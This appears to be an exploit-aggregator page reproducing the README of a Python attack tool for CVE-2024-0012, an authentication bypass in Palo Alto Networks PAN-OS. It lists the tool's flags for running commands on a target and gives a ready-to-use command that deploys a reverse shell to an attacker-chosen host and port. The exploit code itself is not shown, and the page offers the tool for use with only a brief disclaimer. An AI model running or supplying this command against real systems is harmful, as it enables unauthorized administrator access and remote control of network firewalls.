Share
## https://sploitus.com/exploit?id=DAD6DD2C-0F2B-5059-B512-35E636A352D4
[![Python 3.x](https://img.shields.io/badge/python-3.x-yellow.svg)](https://www.python.org/)
# CVE-2024-0012

CVE-2024-0012 an authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities.

# Screenshot
![cve-2024-0012](https://github.com/user-attachments/assets/0b01442b-e8f8-4327-8a21-886f16872311)

| :exclamation:  **Disclaimer**  |
|---------------------------------|
| This project is primarily built to be used as a standalone CLI tool. **Running this exploit as a service may pose security risks.** It's recommended to use with caution and additional security measures. DWYOR |

# Usage
```
python3 cve-2024-0012.py -h
```

This will display help for the tool. Here are all the switches it supports.
```yaml
Usage:
  python3 cve-2024-0012.py [flags]

Flags:
  -h, --help         show this help message and exit
  --url URL          Target base URL (http:// or https://)
  --no-verify        Disable SSL verification
  --timeout TIMEOUT  Request timeout in seconds
  --command COMMAND  Command to execute on the target
  --reverse-shell    Deploy a reverse shell to the target
  --lhost LHOST      Local host for reverse shell connection (required for reverse shell)
  --lport LPORT      Local port for reverse shell connection (required for reverse shell)
```
Reverse Shell Command.
```
python3 cve-2024-0012.py --url "http://target.url" --no-verify --reverse-shell --lhost "your-ip" --lport 4444
```
- Replace 4444 with the port you are using.

# Credits

- [Chirag Artani](https://3rag.com/ )
- [Sachin Artani](https://github.com/Sachinart/ )
- [Muhammad Mugni Abdul Gani](https://www.instagram.com/mtwo7.id/)